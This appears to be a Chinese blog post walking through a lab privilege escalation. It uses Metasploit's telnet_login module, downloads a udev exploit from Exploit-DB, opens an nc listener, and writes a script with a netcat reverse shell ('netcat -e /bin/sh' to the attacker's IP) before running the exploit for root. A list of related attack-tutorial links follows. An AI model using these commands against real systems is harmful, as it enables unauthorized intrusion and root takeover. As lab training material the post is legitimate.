漏洞利用-Telnet登录提权

最新推荐文章于 2025-04-07 23:22:19 发布
原创 最新推荐文章于 2025-04-07 23:22:19 发布 · 1.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #shell #telnet #kali linux

本文详细介绍如何使用Metasploit框架进行远程登录及权限提升操作,包括利用telnet登录目标系统、下载并执行exploit、设置监听以获取更高级别的shell访问等关键步骤。

目录

 

msf登录telnet

msf连接shell下载exp

设置kali nc监听

编译执行exp,获取root

msf登录telnet

在metasploit中使用  telnet_login模块进行登录,并使用sessions -i id 连接shell。

kali中启动 metasploit  利用telnet_login模块连接(这里假设知道账号和密码 不知道的话可以爆破)

获得shell

 

msf连接shell下载exp

使用 wget进行下载

wget http://www.exploit-db.com/download/8572

这里先是下载到了kali上 再利用靶机(此时已经利用telnet连接)通过apache2下载了exp

 

设置kali nc监听

使用 netcat 进行监听 后期返回的shell。

nc -lvp 4444

编译执行exp,获取root

gcc 源文件  -o  exploit

echo '#!/bin/sh' > /tmp/run

echo '/bin/netcat -e /bin/sh kali的IP地址 4444' >> /tmp/run

ps -edf |grep udev

执行exploit   具有root权限的pid -1

./exploit 数字pid -1

得到root权限

[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 1568
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
Apache Flink (最新版本) 远程代码执行
应无所住而生其心
05-04 1093
路虽远,行则将至;事虽难,做则必成
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 3405
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
Linux学习之Telnet明文漏洞
qq_42108074的博客
08-19 621
此文章为8月Day 19学习笔记,内容来源于极客时间。里边,鼠标右键点击第一条数据,然后选择。再打开在同一个内网的主机,然后使用。然后就看到了显示界面中的密码。,之后输入用户名和密码,注意。来监控端口,然后把数据传给。,把监听的信息保存到。
Kali学习 | 漏洞利用:4.8 渗透攻击Telnet服务
qq_43233085的博客
01-11 4452
Kali学习 | 漏洞利用:4.8 渗透攻击Telnet服务Telnet介绍操作步骤 Telnet介绍 Telnet服务是一种“客户端/服务器”架构,在整个Telnet运行的流程架构中一定包括两个组件,分别是Telnet服务器和Telnet客户端。 由于Telnet是使用明文的方式传输数据的,所以并不安全。 这里就可以使用Metasplolit中的一个模块,可以破解出Telnet服务的用户名和密码...
4.6、漏洞利用-Telnet
c10udz的博客
10-03 5727
Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口(1)使用nmap获取(2)使用metasploit。
Telnet攻击
uuty的专栏
10-18 3136
所谓对telnet攻击也不外乎对telnet的用户猜解和对telnet服务进程的溢出,除了这些, 本人觉得telnet并没有太大的问题.telnet的连接并不是大家想象的那么简单了,虽然没有像ssh那样进行加密, 不过, 还是比ftp等通讯来的复杂。   D:>telnet 192.168.25.1 Red Hat Linux release 7.3 (Valhalla) Kernel 2.4.
6-9漏洞利用-Telnet登陆
山兔的博客
07-16 730
使用弱口令登录之后,进行
Metasploitable2-Linux。关于老师给了任务,一位彦祖返回家无私奉献,打穿靶场的故事。手搓+msf漏洞利用
Zeu_s的博客
04-07 1244
端口 21vsftpd2.3.4笑脸后门漏洞 22弱口令 23弱口令 25 CNNVD-200111-004 53 ISC BIND 80 http 111 rpcbind 139/445 smb 512 rexec(远程计算机上运行命令)爆破 1099 java-rmi 1524 bind_shell 2049 nfs 2121 ftp 3306 mysql 3632 distccd 5432 postgresql 5900 vnc 6667/6697 irc 8009 ajp 8180 tomcat示例
网络攻防实战研究 漏洞利用读书笔记二
一枚努力的蛋蛋
08-24 3521
网络攻防实战研究 漏洞利用读书笔记二第2章 Windows漏洞利用2.1 Windows基础2.1.1 Windows信息的收集2.1.2 Windows准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施2.1.5 停用安全狗2.2 辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
Vulnhub-DC 7-9 、端口敲门
2301_80115097的博客
04-28 1292
Vulnhub是一个供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本)
Zyxel Telnet 漏洞分析(CVE-2025-0890、CVE‑2024‑40891)
2401_85280228的博客
02-27 1856
参考资料这是2025年开年分析的第一个洞。2月4日 Zyxel 发布安全公告,旗下部分旧款 DSL 客户终端设备(CPE)存在严重的安全漏洞[1],包括 默认凭证不安全问题 和 命令注入漏洞攻击者可通过默认凭证登录 Telnet利用漏洞在受影响的设备上执行任意命令。
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 7464
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
内网渗透(telnet爆破)
m0_46684679的博客
07-27 5698
python实现变位词 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
Telnet弱口令渗透测试
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
09-22 5060
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。
端口渗透之telnet服务
马赛克的博客
03-15 2681
00x01环境准备 靶机windowserver 2003 IP:10.10.10.137 攻击机:Windows 10 注:telnet需要知道用户名和密码以及23端口开放 00x02靶机配置 启动telnet服务,windows+r输入services.msc 找到telnet设置启动 查看本地用户组 net localgroup 查看telnet成员组...
渗透测试学习笔记一 Telnet(HTB Meow)
Rick66Ashley的博客
10-26 337
1.首先要开始渗透测试,就必须让攻击机和靶机连在同一网络上,一般使用openVPN,将攻击机和靶机都连在VPN服务器上,形成一个虚拟网络。2.连接成功以后,首先对靶机进行ping测试。注意区分靶机的IP和VPN服务器的IP,成功连接到靶机,然后看看登录什么用户,最后发现root没有设置密码,空白密码登录。5最后ls命令发现flag之后cat flag.txt,case closed。基础知识:1 VM=virtual machine虚拟机。3与靶机的连接通过openvpn供的vpn服务。
入门渗透:telnet远程登入——Meow
栉风沐雪的博客
01-30 1124
本文为入门级渗透测试,在hackthebox平台使用相关靶机,以kali作为攻击机进行演示。在登入telnet时可以发现该靶机的系统为linux,所以接下来使用的指令都是linux相关的。telnet需要用户和密码登入,但是有时候会因为程序员的失误没有设置登入密码(如此靶机)由于一般未知目标开放了哪些端口运行了哪些协议扫描时要扫描所有端口。因为用的是kali攻击机所以在此使用nmap脚本进行扫描。如图可以发现目标机器的23端口上运行着telnet
4. 使用kali 扫描linux操作系统(metasploitable)目标靶机的端口及系统相关信息;再利用kali机开源的漏洞检测工具,获取漏洞相关信息,最后利用攻击模块进入靶机系统,并利用相应工具获取系统限。
最新发布
06-20
Metasploit 供了大量预定义的漏洞利用模块,可以根据目标系统的具体配置选择适当的模块。例如,若目标系统存在某个已知漏洞,可以加载对应的 exploit 模块并设置参数: ```bash use exploit/linux/ set RHOSTS ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值